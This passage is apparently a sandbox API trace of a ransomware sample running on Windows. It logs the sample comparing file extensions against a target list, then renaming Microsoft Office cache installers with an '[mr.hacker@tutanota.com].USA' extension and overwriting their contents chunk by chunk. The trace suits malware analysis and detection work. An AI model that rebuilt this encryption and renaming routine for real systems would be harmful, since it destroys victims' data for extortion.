(lpString1=".docx", lpString2="I.msi") returned -1 [0036.059] lstrlenW (lpString=".pdf") returned 4 [0036.059] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.059] lstrlenW (lpString=".xls") returned 4 [0036.059] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.059] lstrlenW (lpString=".xlsx") returned 5 [0036.059] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.059] lstrlenW (lpString=".ppt") returned 4 [0036.059] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString=".zip") returned 4 [0036.059] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.059] lstrlenW (lpString=".rar") returned 4 [0036.059] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.059] lstrlenW (lpString=".bz2") returned 4 [0036.059] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.060] lstrlenW (lpString=".7z") returned 3 [0036.060] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.060] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.060] lstrlenW (lpString=".dbf") returned 4 [0036.060] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.060] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.060] lstrlenW (lpString=".1cd") returned 4 [0036.060] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.060] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.060] lstrlenW (lpString=".jpg") returned 4 [0036.060] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.065] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0036.065] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0036.065] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0036.065] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=2513920) returned 1 [0036.065] CloseHandle (hObject=0x170) returned 1 [0036.065] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0036.066] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.066] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0036.077] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0036.078] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.078] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.078] ReadFile (in: hFile=0x170, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.098] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.098] ReadFile (in: hFile=0x170, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.189] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.189] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.189] ReadFile (in: hFile=0x170, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.460] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.460] WriteFile (in: hFile=0x170, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc010c, lpOverlapped=0x0) returned 1 [0036.479] SetEndOfFile (hFile=0x170) returned 1 [0036.479] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0036.483] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.483] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.485] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.485] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.726] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.726] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.729] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0036.729] CloseHandle (hObject=0x170) returned 1 [0037.122] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0037.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.122] lstrlenW (lpString=".doc") returned 4 [0037.122] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.122] lstrlenW (lpString=".docx") returned 5 [0037.122] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.122] lstrlenW (lpString=".pdf") returned 4 [0037.122] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.122] lstrlenW (lpString=".xls") returned 4 [0037.122] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.122] lstrlenW (lpString=".xlsx") returned 5 [0037.122] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.122] lstrlenW (lpString=".ppt") returned 4 [0037.122] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.122] lstrlenW (lpString=".zip") returned 4 [0037.122] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.122] lstrlenW (lpString=".rar") returned 4 [0037.122] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.122] lstrlenW (lpString=".bz2") returned 4 [0037.122] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.122] lstrlenW (lpString=".7z") returned 3 [0037.122] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.122] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".dbf") returned 4 [0037.123] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".1cd") returned 4 [0037.123] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".jpg") returned 4 [0037.123] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".doc") returned 4 [0037.123] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.123] lstrlenW (lpString=".docx") returned 5 [0037.123] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.123] lstrlenW (lpString=".pdf") returned 4 [0037.123] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.123] lstrlenW (lpString=".xls") returned 4 [0037.123] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.123] lstrlenW (lpString=".xlsx") returned 5 [0037.123] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.123] lstrlenW (lpString=".ppt") returned 4 [0037.123] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".zip") returned 4 [0037.123] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.123] lstrlenW (lpString=".rar") returned 4 [0037.123] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.123] lstrlenW (lpString=".bz2") returned 4 [0037.123] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.123] lstrlenW (lpString=".7z") returned 3 [0037.123] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.123] lstrlenW (lpString=".dbf") returned 4 [0037.124] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.124] lstrlenW (lpString=".1cd") returned 4 [0037.124] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.124] lstrlenW (lpString=".jpg") returned 4 [0037.124] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.124] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0037.124] lstrlenW (lpString="OutlkLR.cab") returned 11 [0037.124] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.124] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=14819276) returned 1 [0037.124] CloseHandle (hObject=0x170) returned 1 [0037.124] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0037.124] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.125] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0037.125] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.125] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.125] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.125] ReadFile (in: hFile=0x170, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.505] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.506] ReadFile (in: hFile=0x170, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.510] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.510] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.510] ReadFile (in: hFile=0x170, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.527] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.527] WriteFile (in: hFile=0x170, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0037.542] SetEndOfFile (hFile=0x170) returned 1 [0037.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0037.546] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.546] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.547] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.547] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.548] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.548] WriteFile (in: hFile=0x170, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.226] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0038.226] CloseHandle (hObject=0x170) returned 1 [0040.847] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0040.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.873] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.873] lstrlenW (lpString=".doc") returned 4 [0040.873] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.873] lstrlenW (lpString=".docx") returned 5 [0040.874] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.874] lstrlenW (lpString=".pdf") returned 4 [0040.874] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString=".xls") returned 4 [0040.874] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString=".xlsx") returned 5 [0040.874] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.874] lstrlenW (lpString=".ppt") returned 4 [0040.874] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString=".zip") returned 4 [0040.874] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString=".rar") returned 4 [0040.874] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString=".bz2") returned 4 [0040.874] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.874] lstrlenW (lpString=".7z") returned 3 [0040.874] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString=".dbf") returned 4 [0040.874] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString=".1cd") returned 4 [0040.874] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString=".jpg") returned 4 [0040.874] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.874] lstrlenW (lpString=".doc") returned 4 [0040.875] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString=".docx") returned 5 [0040.875] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.875] lstrlenW (lpString=".pdf") returned 4 [0040.875] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString=".xls") returned 4 [0040.875] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString=".xlsx") returned 5 [0040.875] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.875] lstrlenW (lpString=".ppt") returned 4 [0040.875] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.875] lstrlenW (lpString=".zip") returned 4 [0040.875] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString=".rar") returned 4 [0040.875] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString=".bz2") returned 4 [0040.875] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.875] lstrlenW (lpString=".7z") returned 3 [0040.875] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.875] lstrlenW (lpString=".dbf") returned 4 [0040.875] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.875] lstrlenW (lpString=".1cd") returned 4 [0040.875] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.875] lstrlenW (lpString=".jpg") returned 4 [0040.875] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.875] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0040.875] lstrlenW (lpString="Proof.msi") returned 9 [0040.876] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.876] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=875520) returned 1 [0040.876] CloseHandle (hObject=0x1f0) returned 1 [0040.876] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0040.876] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.876] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.876] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.876] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.876] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.876] GetLastError () returned 0x0 [0040.876] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xd5c00, lpOverlapped=0x0) returned 1 [0040.898] WriteFile (in: hFile=0x170, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xd5c10, 